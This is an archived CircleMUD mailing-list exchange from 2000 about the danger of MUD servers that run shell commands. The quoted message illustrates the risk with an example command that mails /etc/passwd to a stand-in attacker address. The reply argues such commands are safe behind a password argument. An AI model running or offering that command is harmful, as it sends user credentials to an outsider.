Re: Ports

From: Shane Lee (mudmaster@Randor.zzn.com)
Date: 09/08/00


---- Begin Original Message ----

From: The Merciless Lord of Everything <serces@mud.dk>
Sent: Fri, 8 Sep 2000 12:25:30 +0200
To: CIRCLE@post.queensu.ca
Subject: Re: [CIRCLE] Ports

-snip-
While I'm on the ranting side :), a mud should imho not be able to
grab
onto system files. I've seen muds offer "ps -axu" and return the
information to the user, even muds that offer the ability to execute
arbitrary commands on the server. Imagine the following in conjunciton
with a mud that runs as root (and offers the above arbitrary)

Mr. Evilguy hacks the admins passwords (grabs it or however Evilguys
get
it :), and does a
"execute pwunconv && mail evilguy@foo.bar < /etc/passwd && pwconv"
Voila.. mr evilguy now has a complete listing of usernames and
passwords.

-snip-

/S




Sir Alec Guinness
 - May the force be with you, Always!

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Hrmm, I beg to differ with you here. I installed pgrun.c written by
Petr Vilim and have found it very useful. After contacting Petr, I
installed a "make" command that allows me to compile the MUD without
having to enter the shell. When you edit the source via save-to-ftp,
you find this more than a bit handy.
Security is not that hard, as long as you protect each command with a
final argument that contains a password. Of course, you want to check
the player's idnum first.
If a hacker is out to get you, there isn't much you can do. I refuse
to stay hudled up in a corner, cowering in fright while life passes
me by.

-FIRE

Get your Free E-mail at http://randor.zzn.com
____________________________________________________________
Get your own Web-Based E-mail Service at http://www.zzn.com


     +------------------------------------------------------------+
     | Ensure that you have read the CircleMUD Mailing List FAQ:  |
     |  http://qsilver.queensu.ca/~fletchra/Circle/list-faq.html  |
     +------------------------------------------------------------+



This archive was generated by hypermail 2b30 : 04/11/01 PDT